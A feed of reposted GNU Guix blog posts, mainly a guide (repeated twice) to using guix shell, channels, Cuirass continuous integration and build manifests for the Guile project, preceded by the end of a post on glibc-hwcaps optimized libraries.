We remove some directories and any binaries since we only want the libraries produced from the package; we want to use the headers and any other bits from the main package. We then combine all of the pieces together to produce a package which can take advantage of the hardware on which it is run:

(define-public gsl-hwcaps
  (package/inherit gsl
    (name "gsl-hwcaps")
    (arguments
     (substitute-keyword-arguments (package-arguments gsl)
       ((#:phases phases #~%standard-phases)
        #~(modify-phases #$phases
            (add-after 'install 'install-optimized-libraries
              (lambda* (#:key inputs outputs #:allow-other-keys)
                (let ((hwcaps "/lib/glibc-hwcaps/"))
                  (for-each
                    (lambda (psabi)
                      (copy-recursively
                        (string-append (assoc-ref inputs (string-append "gsl-" psabi))
                                       hwcaps psabi)
                        (string-append #$output hwcaps psabi))
                  '("x86-64-v2" "x86-64-v3" "x86-64-v4"))))))))
    (native-inputs
     (modify-inputs (package-native-inputs gsl)
                    (append (gsl-hwabi "x86-64-v2")
                            (gsl-hwabi "x86-64-v3")
                            (gsl-hwabi "x86-64-v4"))))
    (supported-systems '("x86_64-linux"))
    (properties `((tunable? . #f)))))

In this case the size of the final package is increased by about 13 MiB, from 5.5 MiB to 18 MiB. It is up to you if the speed-up from providing an optimized library is worth the size trade-off.

To use this package as a replacement build input in a package package-input-rewriting/spec is a handy tool:

(define use-glibc-hwcaps
 (package-input-rewriting/spec
   ;; Replace some packages with ones built targeting custom packages build
   ;; with glibc-hwcaps support.
   `(("gsl" . ,(const gsl-hwcaps)))))

(define-public inkscape-with-hwcaps
  (package
    (inherit (use-glibc-hwcaps inkscape))
    (name "inkscape-with-hwcaps")))

Of the Guix supported architectures, x86_64-linux and powerpc64le-linux can both benefit from this new capability.

Through the magic of newer versions of GCC and LLVM it is safe to use these libraries in place of the standard libraries while compiling packages; these compilers know about the glibc-hwcap directories and will purposefully link against the base library during build time, with glibc's ld.so choosing the optimized library at runtime.

One possible use case for these libraries is crating guix packs of packages to run on other systems. By substituting these libraries it becomes possible to crate a guix pack which will have better performance than a standard package used in a guix pack. This works even when the included libraries don't make use of the IFUNCs from glibc or functional multi-versioning from GCC. Providing optimized yet portable pre-compiled binaries is a great way to take advantage of this feature.

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: From development environments to continuous integration—the ultimate guide to software development with Guix

Guix is a handy tool for developers; guix shell, in particular, gives a standalone development environment for your package, no matter what language(s) it’s written in. To benefit from it, you have to initially write a package definition and have it either in Guix proper, in a channel, or directly upstream as a guix.scm file. This last option is appealing: all developers have to do to get set up is clone the project's repository and run guix shell, with no arguments—we looked at the rationale for guix shell in an earlier article.

Development needs go beyond development environments though. How can developers perform continuous integration of their code in Guix build environments? How can they deliver their code straight to adventurous users? This post describes a set of files developers can add to their repository to set up Guix-based development environments, continuous integration, and continuous delivery—all at once.

Getting started

How do we go about “Guixifying” a repository? The first step, as we’ve seen, will be to add a guix.scm at the root of the repository in question. We’ll take Guile as an example in this post: it’s written in Scheme (mostly) and C, and has a number of dependencies—a C compilation tool chain, C libraries, Autoconf and its friends, LaTeX, and so on. The resulting guix.scm looks like the usual package definition, just without the define-public bit:

;; The ‘guix.scm’ file for Guile, for use by ‘guix shell’.

(use-modules (guix)
             (guix build-system gnu)
             ((guix licenses) #:prefix license:)
             (gnu packages autotools)
             (gnu packages base)
             (gnu packages bash)
             (gnu packages bdw-gc)
             (gnu packages compression)
             (gnu packages flex)
             (gnu packages gdb)
             (gnu packages gettext)
             (gnu packages gperf)
             (gnu packages libffi)
             (gnu packages libunistring)
             (gnu packages linux)
             (gnu packages pkg-config)
             (gnu packages readline)
             (gnu packages tex)
             (gnu packages texinfo)
             (gnu packages version-control))

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source #f)                                     ;no source
  (build-system gnu-build-system)
  (native-inputs
   (append (list autoconf
                 automake
                 libtool
                 gnu-gettext
                 flex
                 texinfo
                 texlive-base                 ;for "make pdf"
                 texlive-epsf
                 gperf
                 git
                 gdb
                 strace
                 readline
                 lzip
                 pkg-config)

           ;; When cross-compiling, a native version of Guile itself is
           ;; needed.
           (if (%current-target-system)
               (list this-package)
               '())))
  (inputs
   (list libffi bash-minimal))
  (propagated-inputs
   (list libunistring libgc))

  (native-search-paths
   (list (search-path-specification
          (variable "GUILE_LOAD_PATH")
          (files '("share/guile/site/3.0")))
         (search-path-specification
          (variable "GUILE_LOAD_COMPILED_PATH")
          (files '("lib/guile/3.0/site-ccache")))))
  (synopsis "Scheme implementation intended especially for extensions")
  (description
   "Guile is the GNU Ubiquitous Intelligent Language for Extensions,
and it's actually a full-blown Scheme implementation!")
  (home-page "https://www.gnu.org/software/guile/")
  (license license:lgpl3+))

Quite a bit of boilerplate, but now someone who’d like to hack on Guile just needs to run:

guix shell

That gives them a shell containing all the dependencies of Guile: those listed above, but also implicit dependencies such as the GCC tool chain, GNU Make, sed, grep, and so on. The chef’s recommendation:

guix shell --container --link-profile

That gives a shell in an isolated container, and all the dependencies show up in $HOME/.guix-profile, which plays well with caches such as config.cache and absolute file names recorded in generated Makefiles and the likes. The fact that the shell runs in a container brings peace of mind: nothing but the current directory and Guile’s dependencies is visible inside the container; nothing from the system can possibly interfere with your development.

Level 1: Building with Guix

Now that we have a package definition, why not also take advantage of it so we can build Guile with Guix? We had left the source field empty, because guix shell above only cares about the inputs of our package—so it can set up the development environment—not about the package itself.

To build the package with Guix, we’ll need to fill out the source field, along these lines:

(use-modules (guix)
             (guix git-download)  ;for ‘git-predicate’
             …)

(define vcs-file?
  ;; Return true if the given file is under version control.
  (or (git-predicate (current-source-directory))
      (const #t)))                                ;not in a Git checkout

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source (local-file "." "guile-checkout"
                      #:recursive? #t
                      #:select? vcs-file?))
  …)

Here’s what we changed:

  1. We added (guix git-download) to our set of imported modules, so we can use its git-predicate procedure.
  2. We defined vcs-file? as a procedure that returns true when passed a file that is under version control. For good measure, we add a fallback case for when we’re not in a Git checkout: always return true.
  3. We set source to a local-file—a recursive copy of the current directory ("."), limited to files under version control (the #:select? bit).

From there on, our guix.scm file serves a second purpose: it lets us build the software with Guix. The whole point of building with Guix is that it’s a “clean” build—you can be sure nothing from your working tree or system interferes with the build result—and it lets you test a variety of things. First, you can do a plain native build:

guix build -f guix.scm

But you can also build for another system (possibly after setting up offloading or transparent emulation):

guix build -f guix.scm -s aarch64-linux -s riscv64-linux

… or cross-compile:

guix build -f guix.scm --target=x86_64-w64-mingw32

You can also use package transformation options to test package variants:

# What if we built with Clang instead of GCC?
guix build -f guix.scm \
  --with-c-toolchain=guile@3.0.99-git=clang-toolchain

# What about that under-tested configure flag?
guix build -f guix.scm \
  --with-configure-flag=guile@3.0.99-git=--disable-networking

Handy!

Level 2: The repository as a channel

We now have a Git repository containing (among other things) a package definition. Can’t we turn it into a channel? After all, channels are designed to ship package definitions to users, and that’s exactly what we’re doing with our guix.scm.

Turns out we can indeed turn it into a channel, but with one caveat: we must create a separate directory for the .scm file(s) of our channel so that guix pull doesn’t load unrelated .scm files when someone pulls the channel—and in Guile, there are lots of them! So we’ll start like this, keeping a top-level guix.scm symlink for the sake of guix shell:

mkdir -p .guix/modules
mv guix.scm .guix/modules/guile-package.scm
ln -s .guix/modules/guile-package.scm guix.scm

To make it usable as part of a channel, we need to turn our guix.scm file into a module: we do that by changing the use-modules form at the top to a define-module form. We also need to actually export a package variable, with define-public, while still returning the package value at the end of the file so we can still use guix shell and guix build -f guix.scm. The end result looks like this (not repeating things that haven’t changed):

(define-module (guile-package)
  #:use-module (guix)
  #:use-module (guix git-download)   ;for ‘git-predicate’
  …)

(define-public guile
  (package
    (name "guile")
    (version "3.0.99-git")                          ;funky version number
    …))

;; Return the package object define above at the end of the module.
guile

We need one last thing: a .guix-channel file so Guix knows where to look for package modules in our repository:

;; This file lets us present this repo as a Guix channel.

(channel
  (version 0)
  (directory ".guix/modules"))  ;look for package modules under .guix/modules/

To recap, we now have these files:

.
├── .guix-channel
├── guix.scm → .guix/modules/guile-package.scm
└── .guix
    └── modules
       └── guile-package.scm

And that’s it: we have a channel! (We could do better and support channel authentication so users know they’re pulling genuine code. We’ll spare you the details here but it’s worth considering!) Users can pull from this channel by adding it to ~/.config/guix/channels.scm, along these lines:

(append (list (channel
                (name 'guile)
                (url "https://git.savannah.gnu.org/git/guile.git")
                (branch "main")))
        %default-channels)

After running guix pull, we can see the new package:

$ guix describe
Generation 264  May 26 2023 16:00:35    (current)
  guile 36fd2b4
    repository URL: https://git.savannah.gnu.org/git/guile.git
    branch: main
    commit: 36fd2b4920ae926c79b936c29e739e71a6dff2bc
  guix c5bc698
    repository URL: https://git.savannah.gnu.org/git/guix.git
    commit: c5bc698e8922d78ed85989985cc2ceb034de2f23
$ guix package -A ^guile$
guile   3.0.99-git      out,debug       guile-package.scm:51:4
guile   3.0.9           out,debug       gnu/packages/guile.scm:317:2
guile   2.2.7           out,debug       gnu/packages/guile.scm:258:2
guile   2.2.4           out,debug       gnu/packages/guile.scm:304:2
guile   2.0.14          out,debug       gnu/packages/guile.scm:148:2
guile   1.8.8           out             gnu/packages/guile.scm:77:2
$ guix build guile@3.0.99-git
[…]
/gnu/store/axnzbl89yz7ld78bmx72vpqp802dwsar-guile-3.0.99-git-debug
/gnu/store/r34gsij7f0glg2fbakcmmk0zn4v62s5w-guile-3.0.99-git

That’s how, as a developer, you get your software delivered directly into the hands of users! No intermediaries, yet no loss of transparency and provenance tracking.

With that in place, it also becomes trivial for anyone to create Docker images, Deb/RPM packages, or a plain tarball with guix pack:

# How about a Docker image of our Guile snapshot?
guix pack -f docker -S /bin=bin guile@3.0.99-git

# And a relocatable RPM?
guix pack -f rpm -R -S /bin=bin guile@3.0.99-git

Bonus: Package variants

We now have an actual channel, but it contains only one package. While we’re at it, we can define package variants in our guile-package.scm file, variants that we want to be able to test as Guile developers—similar to what we did above with transformation options. We can add them like so:

;; This is the ‘.guix/modules/guile-package.scm’ file.

(define-module (guile-package)
  …)

(define-public guile
  …)

(define (package-with-configure-flags p flags)
  "Return P with FLAGS as addition 'configure' flags."
  (package/inherit p
    (arguments
     (substitute-keyword-arguments (package-arguments p)
       ((#:configure-flags original-flags #~(list))
        #~(append #$original-flags #$flags))))))

(define-public guile-without-threads
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--without-threads")))
    (name "guile-without-threads")))

(define-public guile-without-networking
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--disable-networking")))
    (name "guile-without-networking")))


;; Return the package object defined above at the end of the module.
guile

We can build these variants as regular packages once we’ve pulled the channel. Alternatively, from a checkout of Guile, we can run a command like this one from the top level:

guix build -L $PWD/.guix/modules guile-without-threads

Level 3: Setting up continuous integration

This channel becomes even more interesting once we set up continuous integration (CI). There are several ways to do that.

You can use one of the mainstream continuous integration tools, such as GitLab-CI. To do that, you need to make sure you run jobs in a Docker image or virtual machine that has Guix installed. If we were to do that in the case of Guile, we’d have a job that runs a shell command like this one:

guix build -L $PWD/.guix/modules guile@3.0.99-git

Doing this works great and has the advantage of being easy to achieve on your favorite CI platform.

That said, you’ll really get the most of it by using Cuirass, a CI tool designed for and tightly integrated with Guix. Using it is more work than using a hosted CI tool because you first need to set it up, but that setup phase is greatly simplified if you use its Guix System service. Going back to our example, we give Cuirass a spec file that goes like this:

;; Cuirass spec file to build all the packages of the ‘guile’ channel.
(list (specification
        (name "guile")
        (build '(channels guile))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

It differs from what you’d do with other CI tools in two important ways:

  • Cuirass knows it’s tracking two channels, guile and guix. Indeed, our own guile package depends on many packages provided by the guix channel—GCC, the GNU libc, libffi, and so on. Changes to packages from the guix channel can potentially influence our guile build and this is something we’d like to see as soon as possible as Guile developers.
  • Build results are not thrown away: they can be distributed as substitutes so that users of our guile channel transparently get pre-built binaries!

From a developer’s viewpoint, the end result is this status page listing evaluations : each evaluation is a combination of commits of the guix and guile channels providing a number of jobs —one job per package defined in guile-package.scm times the number of target architectures.

As for substitutes, they come for free! As an example, since our guile jobset is built on ci.guix.gnu.org, which runs guix publish in addition to Cuirass, one automatically gets substitutes for guile builds from ci.guix.gnu.org; no additional work is needed for that.

Bonus: Build manifest

The Cuirass spec above is convenient: it builds every package in our channel, which includes a few variants. However, this might be insufficiently expressive in some cases: one might want specific cross-compilation jobs, transformations, Docker images, RPM/Deb packages, or even system tests.

To achieve that, you can write a manifest. The one we have for Guile has entries for the package variants we defined above, as well as additional variants and cross builds:

;; This is ‘.guix/manifest.scm’.

(use-modules (guix)
             (guix profiles)
             (guile-package))   ;import our own package module

(define* (package->manifest-entry* package system
                                   #:key target)
  "Return a manifest entry for PACKAGE on SYSTEM, optionally cross-compiled to
TARGET."
  (manifest-entry
    (inherit (package->manifest-entry package))
    (name (string-append (package-name package) "." system
                         (if target
                             (string-append "." target)
                             "")))
    (item (with-parameters ((%current-system system)
                            (%current-target-system target))
            package))))

(define native-builds
  (manifest
   (append (map (lambda (system)
                  (package->manifest-entry* guile system))

                '("x86_64-linux" "i686-linux"
                  "aarch64-linux" "armhf-linux"
                  "powerpc64le-linux"))
           (map (lambda (guile)
                  (package->manifest-entry* guile "x86_64-linux"))
                (cons (package
                        (inherit (package-with-c-toolchain
                                  guile
                                  `(("clang-toolchain"
                                     ,(specification->package
                                       "clang-toolchain")))))
                        (name "guile-clang"))
                      (list guile-without-threads
                            guile-without-networking
                            guile-debug
                            guile-strict-typing))))))

(define cross-builds
  (manifest
   (map (lambda (target)
          (package->manifest-entry* guile "x86_64-linux"
                                    #:target target))
        '("i586-pc-gnu"
          "aarch64-linux-gnu"
          "riscv64-linux-gnu"
          "i686-w64-mingw32"
          "x86_64-linux-gnu"))))

(concatenate-manifests (list native-builds cross-builds))

We won’t go into the details of this manifest; suffice to say that it provides additional flexibility. We now need to tell Cuirass to build this manifest, which is done with a spec slightly different from the previous one:

;; Cuirass spec file to build all the packages of the ‘guile’ channel.
(list (specification
        (name "guile")
        (build '(manifest ".guix/manifest.scm"))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

We changed the (build …) part of the spec to '(manifest ".guix/manifest.scm") so that it would pick our manifest, and that’s it!

Wrapping up

We picked Guile as the running example in this post and you can see the result here:

These days, repositories are commonly peppered with dot files for various tools: .envrc, .gitlab-ci.yml, .github/workflows, Dockerfile, .buildpacks, Aptfile, requirements.txt, and whatnot. It may sound like we’re proposing a bunch of additional files, but in fact those files are expressive enough to supersede most or all of those listed above.

With a couple of files, we get support for:

  • development environments (guix shell);
  • pristine test builds, including for package variants and for cross-compilation (guix build);
  • continuous integration (with Cuirass or with some other tool);
  • continuous delivery to users ( via the channel and with pre-built binaries);
  • generation of derivative build artifacts such as Docker images or Deb/RPM packages (guix pack).

At the Guix headquarters, we’re quite happy about the result. We’ve been building a unified tool set for reproducible software deployment; this is an illustration of how you as a developer can benefit from it!

Acknowledgments

Thanks to Attila Lendvai, Brian Cully, and Ricardo Wurmus for providing feedback on an earlier draft of this post.

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: From development environments to continuous integration—the ultimate guide to software development with Guix

Guix is a handy tool for developers; guix shell, in particular, gives a standalone development environment for your package, no matter what language(s) it’s written in. To benefit from it, you have to initially write a package definition and have it either in Guix proper, in a channel, or directly upstream as a guix.scm file. This last option is appealing: all developers have to do to get set up is clone the project's repository and run guix shell, with no arguments—we looked at the rationale for guix shell in an earlier article.

Development needs go beyond development environments though. How can developers perform continuous integration of their code in Guix build environments? How can they deliver their code straight to adventurous users? This post describes a set of files developers can add to their repository to set up Guix-based development environments, continuous integration, and continuous delivery—all at once.

Getting started

How do we go about “Guixifying” a repository? The first step, as we’ve seen, will be to add a guix.scm at the root of the repository in question. We’ll take Guile as an example in this post: it’s written in Scheme (mostly) and C, and has a number of dependencies—a C compilation tool chain, C libraries, Autoconf and its friends, LaTeX, and so on. The resulting guix.scm looks like the usual package definition, just without the define-public bit:

;; The ‘guix.scm’ file for Guile, for use by ‘guix shell’.

(use-modules (guix)
             (guix build-system gnu)
             ((guix licenses) #:prefix license:)
             (gnu packages autotools)
             (gnu packages base)
             (gnu packages bash)
             (gnu packages bdw-gc)
             (gnu packages compression)
             (gnu packages flex)
             (gnu packages gdb)
             (gnu packages gettext)
             (gnu packages gperf)
             (gnu packages libffi)
             (gnu packages libunistring)
             (gnu packages linux)
             (gnu packages pkg-config)
             (gnu packages readline)
             (gnu packages tex)
             (gnu packages texinfo)
             (gnu packages version-control))

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source #f)                                     ;no source
  (build-system gnu-build-system)
  (native-inputs
   (append (list autoconf
                 automake
                 libtool
                 gnu-gettext
                 flex
                 texinfo
                 texlive-base                 ;for "make pdf"
                 texlive-epsf
                 gperf
                 git
                 gdb
                 strace
                 readline
                 lzip
                 pkg-config)

           ;; When cross-compiling, a native version of Guile itself is
           ;; needed.
           (if (%current-target-system)
               (list this-package)
               '())))
  (inputs
   (list libffi bash-minimal))
  (propagated-inputs
   (list libunistring libgc))

  (native-search-paths
   (list (search-path-specification
          (variable "GUILE_LOAD_PATH")
          (files '("share/guile/site/3.0")))
         (search-path-specification
          (variable "GUILE_LOAD_COMPILED_PATH")
          (files '("lib/guile/3.0/site-ccache")))))
  (synopsis "Scheme implementation intended especially for extensions")
  (description
   "Guile is the GNU Ubiquitous Intelligent Language for Extensions,
and it's actually a full-blown Scheme implementation!")
  (home-page "https://www.gnu.org/software/guile/")
  (license license:lgpl3+))

Quite a bit of boilerplate, but now someone who’d like to hack on Guile just needs to run:

guix shell

That gives them a shell containing all the dependencies of Guile: those listed above, but also implicit dependencies such as the GCC tool chain, GNU Make, sed, grep, and so on. The chef’s recommendation:

guix shell --container --link-profile

That gives a shell in an isolated container, and all the dependencies show up in $HOME/.guix-profile, which plays well with caches such as config.cache and absolute file names recorded in generated Makefiles and the likes. The fact that the shell runs in a container brings peace of mind: nothing but the current directory and Guile’s dependencies is visible inside the container; nothing from the system can possibly interfere with your development.

Level 1: Building with Guix

Now that we have a package definition, why not also take advantage of it so we can build Guile with Guix? We had left the source field empty, because guix shell above only cares about the inputs of our package—so it can set up the development environment—not about the package itself.

To build the package with Guix, we’ll need to fill out the source field, along these lines:

(use-modules (guix)
             (guix git-download)  ;for ‘git-predicate’
             …)

(define vcs-file?
  ;; Return true if the given file is under version control.
  (or (git-predicate (current-source-directory))
      (const #t)))                                ;not in a Git checkout

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source (local-file "." "guile-checkout"
                      #:recursive? #t
                      #:select? vcs-file?))
  …)

Here’s what we changed:

  1. We added (guix git-download) to our set of imported modules, so we can use its git-predicate procedure.
  2. We defined vcs-file? as a procedure that returns true when passed a file that is under version control. For good measure, we add a fallback case for when we’re not in a Git checkout: always return true.
  3. We set source to a local-file—a recursive copy of the current directory ("."), limited to files under version control (the #:select? bit).

From there on, our guix.scm file serves a second purpose: it lets us build the software with Guix. The whole point of building with Guix is that it’s a “clean” build—you can be sure nothing from your working tree or system interferes with the build result—and it lets you test a variety of things. First, you can do a plain native build:

guix build -f guix.scm

But you can also build for another system (possibly after setting up offloading or transparent emulation):

guix build -f guix.scm -s aarch64-linux -s riscv64-linux

… or cross-compile:

guix build -f guix.scm --target=x86_64-w64-mingw32

You can also use package transformation options to test package variants:

# What if we built with Clang instead of GCC?
guix build -f guix.scm \
  --with-c-toolchain=guile@3.0.99-git=clang-toolchain

# What about that under-tested configure flag?
guix build -f guix.scm \
  --with-configure-flag=guile@3.0.99-git=--disable-networking

Handy!

Level 2: The repository as a channel

We now have a Git repository containing (among other things) a package definition. Can’t we turn it into a channel? After all, channels are designed to ship package definitions to users, and that’s exactly what we’re doing with our guix.scm.

Turns out we can indeed turn it into a channel, but with one caveat: we must create a separate directory for the .scm file(s) of our channel so that guix pull doesn’t load unrelated .scm files when someone pulls the channel—and in Guile, there are lots of them! So we’ll start like this, keeping a top-level guix.scm symlink for the sake of guix shell:

mkdir -p .guix/modules
mv guix.scm .guix/modules/guile-package.scm
ln -s .guix/modules/guile-package.scm guix.scm

To make it usable as part of a channel, we need to turn our guix.scm file into a module: we do that by changing the use-modules form at the top to a define-module form. We also need to actually export a package variable, with define-public, while still returning the package value at the end of the file so we can still use guix shell and guix build -f guix.scm. The end result looks like this (not repeating things that haven’t changed):

(define-module (guile-package)
  #:use-module (guix)
  #:use-module (guix git-download)   ;for ‘git-predicate’
  …)

(define-public guile
  (package
    (name "guile")
    (version "3.0.99-git")                          ;funky version number
    …))

;; Return the package object define above at the end of the module.
guile

We need one last thing: a .guix-channel file so Guix knows where to look for package modules in our repository:

;; This file lets us present this repo as a Guix channel.

(channel
  (version 0)
  (directory ".guix/modules"))  ;look for package modules under .guix/modules/

To recap, we now have these files:

.
├── .guix-channel
├── guix.scm → .guix/modules/guile-package.scm
└── .guix
    └── modules
       └── guile-package.scm

And that’s it: we have a channel! (We could do better and support channel authentication so users know they’re pulling genuine code. We’ll spare you the details here but it’s worth considering!) Users can pull from this channel by adding it to ~/.config/guix/channels.scm, along these lines:

(append (list (channel
                (name 'guile)
                (url "https://git.savannah.gnu.org/git/guile.git")
                (branch "main")))
        %default-channels)

After running guix pull, we can see the new package:

$ guix describe
Generation 264  May 26 2023 16:00:35    (current)
  guile 36fd2b4
    repository URL: https://git.savannah.gnu.org/git/guile.git
    branch: main
    commit: 36fd2b4920ae926c79b936c29e739e71a6dff2bc
  guix c5bc698
    repository URL: https://git.savannah.gnu.org/git/guix.git
    commit: c5bc698e8922d78ed85989985cc2ceb034de2f23
$ guix package -A ^guile$
guile   3.0.99-git      out,debug       guile-package.scm:51:4
guile   3.0.9           out,debug       gnu/packages/guile.scm:317:2
guile   2.2.7           out,debug       gnu/packages/guile.scm:258:2
guile   2.2.4           out,debug       gnu/packages/guile.scm:304:2
guile   2.0.14          out,debug       gnu/packages/guile.scm:148:2
guile   1.8.8           out             gnu/packages/guile.scm:77:2
$ guix build guile@3.0.99-git
[…]
/gnu/store/axnzbl89yz7ld78bmx72vpqp802dwsar-guile-3.0.99-git-debug
/gnu/store/r34gsij7f0glg2fbakcmmk0zn4v62s5w-guile-3.0.99-git

That’s how, as a developer, you get your software delivered directly into the hands of users! No intermediaries, yet no loss of transparency and provenance tracking.

With that in place, it also becomes trivial for anyone to create Docker images, Deb/RPM packages, or a plain tarball with guix pack:

# How about a Docker image of our Guile snapshot?
guix pack -f docker -S /bin=bin guile@3.0.99-git

# And a relocatable RPM?
guix pack -f rpm -R -S /bin=bin guile@3.0.99-git

Bonus: Package variants

We now have an actual channel, but it contains only one package. While we’re at it, we can define package variants in our guile-package.scm file, variants that we want to be able to test as Guile developers—similar to what we did above with transformation options. We can add them like so:

;; This is the ‘.guix/modules/guile-package.scm’ file.

(define-module (guile-package)
  …)

(define-public guile
  …)

(define (package-with-configure-flags p flags)
  "Return P with FLAGS as addition 'configure' flags."
  (package/inherit p
    (arguments
     (substitute-keyword-arguments (package-arguments p)
       ((#:configure-flags original-flags #~(list))
        #~(append #$original-flags #$flags))))))

(define-public guile-without-threads
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--without-threads")))
    (name "guile-without-threads")))

(define-public guile-without-networking
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--disable-networking")))
    (name "guile-without-networking")))


;; Return the package object defined above at the end of the module.
guile

We can build these variants as regular packages once we’ve pulled the channel. Alternatively, from a checkout of Guile, we can run a command like this one from the top level:

guix build -L $PWD/.guix/modules guile-without-threads

Level 3: Setting up continuous integration

This channel becomes even more interesting once we set up continuous integration (CI). There are several ways to do that.

You can use one of the mainstream continuous integration tools, such as GitLab-CI. To do that, you need to make sure you run jobs in a Docker image or virtual machine that has Guix installed. If we were to do that in the case of Guile, we’d have a job that runs a shell command like this one:

guix build -L $PWD/.guix/modules guile@3.0.99-git

Doing this works great and has the advantage of being easy to achieve on your favorite CI platform.

That said, you’ll really get the most of it by using Cuirass, a CI tool designed for and tightly integrated with Guix. Using it is more work than using a hosted CI tool because you first need to set it up, but that setup phase is greatly simplified if you use its Guix System service. Going back to our example, we give Cuirass a spec file that goes like this:

;; Cuirass spec file to build all the packages of the ‘guile’ channel.
(list (specification
        (name "guile")
        (build '(channels guile))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

It differs from what you’d do with other CI tools in two important ways:

  • Cuirass knows it’s tracking two channels, guile and guix. Indeed, our own guile package depends on many packages provided by the guix channel—GCC, the GNU libc, libffi, and so on. Changes to packages from the guix channel can potentially influence our guile build and this is something we’d like to see as soon as possible as Guile developers.
  • Build results are not thrown away: they can be distributed as substitutes so that users of our guile channel transparently get pre-built binaries!

From a developer’s viewpoint, the end result is this status page listing evaluations : each evaluation is a combination of commits of the guix and guile channels providing a number of jobs —one job per package defined in guile-package.scm times the number of target architectures.

As for substitutes, they come for free! As an example, since our guile jobset is built on ci.guix.gnu.org, which runs guix publish in addition to Cuirass, one automatically gets substitutes for guile builds from ci.guix.gnu.org; no additional work is needed for that.

Bonus: Build manifest

The Cuirass spec above is convenient: it builds every package in our channel, which includes a few variants. However, this might be insufficiently expressive in some cases: one might want specific cross-compilation jobs, transformations, Docker images, RPM/Deb packages, or even system tests.

To achieve that, you can write a manifest. The one we have for Guile has entries for the package variants we defined above, as well as additional variants and cross builds:

;; This is ‘.guix/manifest.scm’.

(use-modules (guix)
             (guix profiles)
             (guile-package))   ;import our own package module

(define* (package->manifest-entry* package system
                                   #:key target)
  "Return a manifest entry for PACKAGE on SYSTEM, optionally cross-compiled to
TARGET."
  (manifest-entry
    (inherit (package->manifest-entry package))
    (name (string-append (package-name package) "." system
                         (if target
                             (string-append "." target)
                             "")))
    (item (with-parameters ((%current-system system)
                            (%current-target-system target))
            package))))

(define native-builds
  (manifest
   (append (map (lambda (system)
                  (package->manifest-entry* guile system))

                '("x86_64-linux" "i686-linux"
                  "aarch64-linux" "armhf-linux"
                  "powerpc64le-linux"))
           (map (lambda (guile)
                  (package->manifest-entry* guile "x86_64-linux"))
                (cons (package
                        (inherit (package-with-c-toolchain
                                  guile
                                  `(("clang-toolchain"
                                     ,(specification->package
                                       "clang-toolchain")))))
                        (name "guile-clang"))
                      (list guile-without-threads
                            guile-without-networking
                            guile-debug
                            guile-strict-typing))))))

(define cross-builds
  (manifest
   (map (lambda (target)
          (package->manifest-entry* guile "x86_64-linux"
                                    #:target target))
        '("i586-pc-gnu"
          "aarch64-linux-gnu"
          "riscv64-linux-gnu"
          "i686-w64-mingw32"
          "x86_64-linux-gnu"))))

(concatenate-manifests (list native-builds cross-builds))

We won’t go into the details of this manifest; suffice to say that it provides additional flexibility. We now need to tell Cuirass to build this manifest, which is done with a spec slightly different from the previous one:

;; Cuirass spec file to build all the packages of the ‘guile’ channel.
(list (specification
        (name "guile")
        (build '(manifest ".guix/manifest.scm"))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

We changed the (build …) part of the spec to '(manifest ".guix/manifest.scm") so that it would pick our manifest, and that’s it!

Wrapping up

We picked Guile as the running example in this post and you can see the result here:

These days, repositories are commonly peppered with dot files for various tools: .envrc, .gitlab-ci.yml, .github/workflows, Dockerfile, .buildpacks, Aptfile, requirements.txt, and whatnot. It may sound like we’re proposing a bunch of additional files, but in fact those files are expressive enough to supersede most or all of those listed above.

With a couple of files, we get support for:

  • development environments (guix shell);
  • pristine test builds, including for package variants and for cross-compilation (guix build);
  • continuous integration (with Cuirass or with some other tool);
  • continuous delivery to users ( via the channel and with pre-built binaries);
  • generation of derivative build artifacts such as Docker images or Deb/RPM packages (guix pack).

At the Guix headquarters, we’re quite happy about the result. We’ve been building a unified tool set for reproducible software deployment; this is an illustration of how you as a developer can benefit from it!

Acknowledgments

Thanks to Attila Lendvai, Brian Cully, and Ricardo Wurmus for providing feedback on an earlier draft of this post.

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Dissecting Guix, Part 2: The Store Monad

Hello again!

